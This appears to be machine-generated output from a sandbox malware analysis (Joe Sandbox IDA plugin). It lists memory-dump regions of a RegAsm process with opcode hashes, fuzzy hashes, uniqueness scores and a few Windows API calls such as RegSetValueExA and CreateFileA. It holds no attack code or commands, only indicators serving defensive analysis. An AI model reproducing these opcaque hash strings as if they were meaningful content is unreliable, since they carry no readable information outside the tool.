                                  • Opcode ID: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction ID: 1b425a9abebd9a4cf9964972c25f5a4cd39e17db1a67d0660db4e4710803085b
                                  • Opcode Fuzzy Hash: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction Fuzzy Hash: 01F055E0860B0A34FF243B252E26BFF01239F427E4F604228FD5285006CF2AC84F0461
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,0A1AC197,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1D89A308
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: dee67d49048ab42dc18c2c5aeff634dcb49119dbb6e21df359aff02c6b9c57aa
                                  • Instruction ID: ee1264542e000dc1f1e38f200ec6b76a44454c9fe046241b71b119e74a46381e
                                  • Opcode Fuzzy Hash: dee67d49048ab42dc18c2c5aeff634dcb49119dbb6e21df359aff02c6b9c57aa
                                  • Instruction Fuzzy Hash: CEF0AF35604784DFDB10CF46D889762FBA4EF84B21F08C09ADD894B352D275A948DAA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegSetValueExA.KERNELBASE(?,00C368C2,00000000,00000001,?,?,?,?,?,?,00C31137,?,?,00000000,00000000,000000FF), ref: 00C31831
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction ID: 9428a53115b5da7353f12e8d7339dafa9696524181653009d336d13ff4d8f942
                                  • Opcode Fuzzy Hash: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction Fuzzy Hash: D6C012706407067AF61005544C2AFD36A579F117B0F900305BE75500E4975348508524
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,00C304A2,00000200,00C318B8,?,?,?,?,00C36953,00C36918,?,?,00C311DE,00000000,000000FF,00000007), ref: 00C37C4D
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID:
                                  • API String ID: 82841172-0
                                  • Opcode ID: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction ID: ef09fb0b1322a84ad82ab9713ca7fd962ccacd7908c5b2b7525d7fe1cb2f05ec
                                  • Opcode Fuzzy Hash: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction Fuzzy Hash: 4DC012743043006BE710891089C4B5F625DAB90751F10C608F9A6851C1CB3088409621
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00C34C54,00C34CC4,00C30A9B,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C34C94
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                                  • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f850e40ddf5bd12217da6d757f737eb11cc38cef69cd5604b7b648674018ec8
                                  • Instruction ID: 0e3a39c994b61e6adf9c7a28992dfdabb58577e4472f9b48245133a1cd20b41b
                                  • Opcode Fuzzy Hash: 3f850e40ddf5bd12217da6d757f737eb11cc38cef69cd5604b7b648674018ec8
                                  • Instruction Fuzzy Hash: 4021BD31F0011ACBCF14ABB9C5A46BEBBB2EFD4300F624865D141AF295DF349D2187A6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6fa1c53744029f150944dfb3b4652af66fdca6e27b6df5abcc62023c9a0597e
                                  • Instruction ID: 64783ce98f6518a52912aa7e5b44e9c756e37f4754f6d2472d3a72b4186693e2
                                  • Opcode Fuzzy Hash: a6fa1c53744029f150944dfb3b4652af66fdca6e27b6df5abcc62023c9a0597e
                                  • Instruction Fuzzy Hash: 28812A34A0021ACFD704DFA8D9D4A9DBBF2FF84305F11856AE006AF2A5DB31AD46DB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f04c84c50d1d276fceeea9ac9b82785c74c0b21f4dfa9979501fc47b5284acd
                                  • Instruction ID: baf2b625ad38b81893d5e0cc104907721336382735c2758206513cb99d4ec81a
                                  • Opcode Fuzzy Hash: 6f04c84c50d1d276fceeea9ac9b82785c74c0b21f4dfa9979501fc47b5284acd
                                  • Instruction Fuzzy Hash: C551C135784222CBDB049A38CC8074973B2FB84710F514668EA5AEF3A1EB71EC06DB59
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 639cd2afcdefb9ec90e2fed9e44dd37cd9c745e49924431010202548a6c47cb2
                                  • Instruction ID: 82b3601272c952815cd6cbdf745b9f6fce9f41325a539603a662e470ee572951
                                  • Opcode Fuzzy Hash: 639cd2afcdefb9ec90e2fed9e44dd37cd9c745e49924431010202548a6c47cb2
                                  • Instruction Fuzzy Hash: A1516D34A0425ACFD704DBB8D9D4ADDBBF1FF89304F10866AD005EB2A6DB31A846CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4950ca3d1080ecf60cdebba6926bf8aed10dc1e138745df27f360c4ec5aec80
                                  • Instruction ID: e72220dae0300b693b902f49e4ab40e120834cef23ef3ff4ca9acd0b29dcb099
                                  • Opcode Fuzzy Hash: b4950ca3d1080ecf60cdebba6926bf8aed10dc1e138745df27f360c4ec5aec80
                                  • Instruction Fuzzy Hash: B841AC38B402118FDB44EBBCC85469D77F2EBD9340F604569C505AB3A2EF36AD02CB95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01d29d856467fb73a2d9bbe1082df7f6a43990752358ca3d5867a7d4ddc85803
                                  • Instruction ID: df2c042848dc297bc5b0d135ab8304cf7cd0f423d6289947a70bc0489d56a966
                                  • Opcode Fuzzy Hash: 01d29d856467fb73a2d9bbe1082df7f6a43990752358ca3d5867a7d4ddc85803
                                  • Instruction Fuzzy Hash: 51412938B002248FCB04EB68DCD569D77F2FB9835075484A6D805BB29ADB317E46CB64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53179f3950ef6032062f9f383dcd37ca253e66325dec8dd36fa6e0f47ce414a7
                                  • Instruction ID: 32aee4600bdf5814d9c2e3c7d39139f0e34507d74e3e1985aff00736218225da
                                  • Opcode Fuzzy Hash: 53179f3950ef6032062f9f383dcd37ca253e66325dec8dd36fa6e0f47ce414a7
                                  • Instruction Fuzzy Hash: 6D319C30B401248BCB44EB7CD8E466EB7F6ABD8340B558529C906EB399DF35AC06C7A5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f65d5318e24e87b56b2c1c2c86b7da6b6c4b0e90420f485fa3b542b9c4b8890
                                  • Instruction ID: 8a911209f0bacee952fe5bd49fce5f95c1aa92698e99e289e1a01bdd48469092
                                  • Opcode Fuzzy Hash: 0f65d5318e24e87b56b2c1c2c86b7da6b6c4b0e90420f485fa3b542b9c4b8890
                                  • Instruction Fuzzy Hash: EE411938B002248FCB04EB29CCD599D7BF6FB9835075484A6E805BB25ADF317D46CB64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0800b69c39c4cef2314c19f8c519bfda4d4f031be7cecb69c53bd3da525e8f3
                                  • Instruction ID: 08dd277c6f0651fe108003533c33272c1bba3af1dcb8fc4d5edde2e756ae87b9
                                  • Opcode Fuzzy Hash: d0800b69c39c4cef2314c19f8c519bfda4d4f031be7cecb69c53bd3da525e8f3
                                  • Instruction Fuzzy Hash: 44318D35B002149FDB04DB78C895BEEBBF2AB8C310F118479E606EB391DE729C058B95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ec62c63189b66dd4b2532c628e49f362735e06201e627a1d57454066f45c357
                                  • Instruction ID: c0707a3d5230241052b16b621421bca4d802f63f9e64b6dc54ba500e971fe19e
                                  • Opcode Fuzzy Hash: 4ec62c63189b66dd4b2532c628e49f362735e06201e627a1d57454066f45c357
                                  • Instruction Fuzzy Hash: D3314B34B002149FDB14DB78C894BAEBBF6AB8C710F118579E606EB391DE729C058B95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5db8f768783a5a6838385ee2ac70f007aeca5de853119d3bfa0bcbc2ae0cb9db
                                  • Instruction ID: e176a948d5650b9c2283075174a7562d38cac68b47046099ab21e860539ef9de
                                  • Opcode Fuzzy Hash: 5db8f768783a5a6838385ee2ac70f007aeca5de853119d3bfa0bcbc2ae0cb9db
                                  • Instruction Fuzzy Hash: 24418B34B042548BEB04DB7DD8987DD7BF5FB94304F118869C111AB266DF356C06CB69
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d81237780977460cc0859f34f061aa61c5b8e053cc377627bb8cd9469dd9c42
                                  • Instruction ID: c8affbd5925a4af57b008efa112cdfb7e6d03ac765ad0107f6440674ccb34fdf
                                  • Opcode Fuzzy Hash: 8d81237780977460cc0859f34f061aa61c5b8e053cc377627bb8cd9469dd9c42
                                  • Instruction Fuzzy Hash: 5441F638B002248FCB04EB28DCD559D77F2FB9835035585A6E805BB26ADF317E46CBA4
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e87acf8766713f976a786e68545ba09fe2cd3e575fed5ca6741d8b1656c733b1
                                  • Instruction ID: 5a022c35bade5b2978645180602d92e995dd6eeab35c7f33991a8af30c31599d
                                  • Opcode Fuzzy Hash: e87acf8766713f976a786e68545ba09fe2cd3e575fed5ca6741d8b1656c733b1
                                  • Instruction Fuzzy Hash: 49318834B002188BDB00EB7DD8D879D7BF9FB94304F118869C115AB266DF356C0ACBA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d6f91934b79d9644c66cf203718e7b95a05b43241070ce53698d42aab1a25b5
                                  • Instruction ID: 6b7588d87e2565a70ad992fd57bffefbb51321861e849f8725957c0cf9ea8e69
                                  • Opcode Fuzzy Hash: 3d6f91934b79d9644c66cf203718e7b95a05b43241070ce53698d42aab1a25b5
                                  • Instruction Fuzzy Hash: C321C131F04216CBCF15ABB8D5A46BEBBB2EF90300F624865C041BF295DF349D2187A6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfb0f053c9c11693a0b653c7f2757653d845263853126670046c7a6b20bafcdb
                                  • Instruction ID: 567f95192db9075026855bf3cbbb6251fbf6feb5654c83a2f930b0025e471abb
                                  • Opcode Fuzzy Hash: cfb0f053c9c11693a0b653c7f2757653d845263853126670046c7a6b20bafcdb
                                  • Instruction Fuzzy Hash: 4121D335B441258FCB04DB7CD8D069E7BF2AB98341B458625C805DB39ADF30AC06CBA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0026a6d0d9a6f5f75aa3d4b93e6bafa7b5a389570a29f60efd753803e44cae4a
                                  • Instruction ID: bae92403bb38c65cad3146119f8f3a4df32e3eb0361fb10ebb6acd6ce82f8d5a
                                  • Opcode Fuzzy Hash: 0026a6d0d9a6f5f75aa3d4b93e6bafa7b5a389570a29f60efd753803e44cae4a
                                  • Instruction Fuzzy Hash: EF117832B04232CFDB048A38CC412C977B2EB89310F110979D505EB390DB75ED12CB84
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb0499d14bbf97476602862eb38fd114e543fdfcdaad1a9f5a3fc1f739c73426
                                  • Instruction ID: cb9bccd3aae435177639d28b89be96a4e292da7d3d286dc113abe4a947bafa83
                                  • Opcode Fuzzy Hash: bb0499d14bbf97476602862eb38fd114e543fdfcdaad1a9f5a3fc1f739c73426
                                  • Instruction Fuzzy Hash: A011BAB5648301AFD340CF19D881A5BFBE4FB98664F14896EF998D7311D331EA148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281186224.000000001D8AA000.00000040.00000001.sdmp, Offset: 1D8AA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d8aa000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c20387da4cd4ab943c418d362905fb7d7f3398faa2fbd466b02370191188e17
                                  • Instruction ID: 844340c555ecdecad656f709b6ecc5683d94ec2573e4200b8bb8a889409151e7
                                  • Opcode Fuzzy Hash: 3c20387da4cd4ab943c418d362905fb7d7f3398faa2fbd466b02370191188e17
                                  • Instruction Fuzzy Hash: 5D11ECB5648301AFD350CF09DC81A57FBE4EB88660F14891EF99997311D271E9148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06e823e7f0d38e531c27dcc55e037c62ec6611f9943a78a47db441bd23e1edfc
                                  • Instruction ID: 2f15f2e4ab4cb59bea5925f38d1bca09dd27ca863acf7cf639f0aac6339eb63e
                                  • Opcode Fuzzy Hash: 06e823e7f0d38e531c27dcc55e037c62ec6611f9943a78a47db441bd23e1edfc
                                  • Instruction Fuzzy Hash: EB11FAB5608301AFD350CF09DC81A57FBE8EB88660F14892EF999D7311D371E9148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f71e8f84a1239301087084ee66c64bd9696403221557529921c2129c4dcb45b
                                  • Instruction ID: aace729b85ac5f7b87289de89bb2d3e72b05b3bed48d0cf35b537ddaf7fd9bfb
                                  • Opcode Fuzzy Hash: 5f71e8f84a1239301087084ee66c64bd9696403221557529921c2129c4dcb45b
                                  • Instruction Fuzzy Hash: A2016D71F401098BCB54DBB9D9451DEBBF5FF99350B6402A5C11AE3241EB315E02CBA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8f2fd7f2bd6a511ad110d40d67084b081c56e84518fe1dd61750191183d5c94
                                  • Instruction ID: ec642684891940a63c1aede20dedfe892cf2b3f3e37016eafc1a319717c116c5
                                  • Opcode Fuzzy Hash: c8f2fd7f2bd6a511ad110d40d67084b081c56e84518fe1dd61750191183d5c94
                                  • Instruction Fuzzy Hash: 3B113A797082458FCB04EB38C8D421D77F1FBC8605F918859E896CB395EB34A909DB43
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24280923432.000000001D860000.00000040.00000040.sdmp, Offset: 1D860000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d860000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bf4dcaeba6900a265a0c3f1dcc340a04f9777e6444fdc7faf391759a3c3ba14
                                  • Instruction ID: b278d98f53e6661ccc27cbfeee51bfe01a7df53d145fbacead73bb210c4e9302
                                  • Opcode Fuzzy Hash: 7bf4dcaeba6900a265a0c3f1dcc340a04f9777e6444fdc7faf391759a3c3ba14
                                  • Instruction Fuzzy Hash: E401DBB55097805FD7118F15DC41862FFE8DF86630708C49FEC49CB652C2296909C771
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b05515a8f63fdfb25d71061938399d645ead571ffbbefa476f5627f544fcce7
                                  • Instruction ID: dc946cc5cf31f31aaa8d629ab4da97bf221ee20eea2a810c46f9e696f5637053
                                  • Opcode Fuzzy Hash: 2b05515a8f63fdfb25d71061938399d645ead571ffbbefa476f5627f544fcce7
                                  • Instruction Fuzzy Hash: 0CF01971F001198FCB54EBB9D9445DEBBF9FFC8350FA00169C50AE7250EA355E018BA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a92ee89d5fbed2446daa676405f82351f5526cf4e9eab24c97b7ffdada749249
                                  • Instruction ID: 272d55b6cd7b253583db6f3cce75dc63e805bbc2243f6114600ec3ed2a1d8d22
                                  • Opcode Fuzzy Hash: a92ee89d5fbed2446daa676405f82351f5526cf4e9eab24c97b7ffdada749249
                                  • Instruction Fuzzy Hash: 5B016975A00219CFCB60EFB8D881AAE7BB6FB59311F50462AC108AB246D7316946CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45bc3c6ef7ba623742a96214ff3e2d85f2f829e07f04e9a5bfeb1e0d8844f131
                                  • Instruction ID: fd8070464a06fde73a7751ca488529014a97ae07aeab52c757acd7b0803f4dbe
                                  • Opcode Fuzzy Hash: 45bc3c6ef7ba623742a96214ff3e2d85f2f829e07f04e9a5bfeb1e0d8844f131
                                  • Instruction Fuzzy Hash: 64F04F72E102168FCB40DFBC98412ADBBF0FB582617214636D119E7290E7305916CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24280923432.000000001D860000.00000040.00000040.sdmp, Offset: 1D860000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d860000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810d3667b8c962ac9465ef24873b9ee49101dd6408d1e2270bf8cf8c5e047415
                                  • Instruction ID: 62b14228030559f2d008f6740706ed343f6b90ce95342c28fe9aa71e55a0c7bb
                                  • Opcode Fuzzy Hash: 810d3667b8c962ac9465ef24873b9ee49101dd6408d1e2270bf8cf8c5e047415
                                  • Instruction Fuzzy Hash: 6FE092B66007048BD650CF0AEC81462FBD4EB84630B08C47FDC0D8B701D275B904CAE1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281186224.000000001D8AA000.00000040.00000001.sdmp, Offset: 1D8AA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d8aa000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d8cccb8d6f28e0f3f0cd7c7c81fb30db7b9da23a6bbaae455e7d378d54191bc
                                  • Instruction ID: a33eefe48fe9b9f13de3301b25094059ff745c113d9016d6365ecd104f4702cf
                                  • Opcode Fuzzy Hash: 0d8cccb8d6f28e0f3f0cd7c7c81fb30db7b9da23a6bbaae455e7d378d54191bc
                                  • Instruction Fuzzy Hash: 48E0D8B6640304A7D2108F069C82B73FB98DB50A30F04C557ED085B342D171B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b42eb7e8fb13425d645ed7862fbcf64e1c8f8997b5245e1b9f8d262cb77b232e
                                  • Instruction ID: 012957ef466bcf0cc9cc5a4c4e4a94cb86728d75fcefd1b3c7d55d42405cb57a
                                  • Opcode Fuzzy Hash: b42eb7e8fb13425d645ed7862fbcf64e1c8f8997b5245e1b9f8d262cb77b232e
                                  • Instruction Fuzzy Hash: CEE0D8B664030067D2108F069C82B63FB98DB90A30F04C46BED085B342D171B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a63952b436ebff2c84b6d82d3222250b41e433d515f8080fd48bab914ad1bed
                                  • Instruction ID: 4b0121d09d08ae0dc2361c1b34e05d8800f55d363e15671f90d759dbdc2fb69f
                                  • Opcode Fuzzy Hash: 9a63952b436ebff2c84b6d82d3222250b41e433d515f8080fd48bab914ad1bed
                                  • Instruction Fuzzy Hash: 7EE0D8B664030467D2509F069C82B63FB98DB40A30F08C45BED0C5B342D172B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
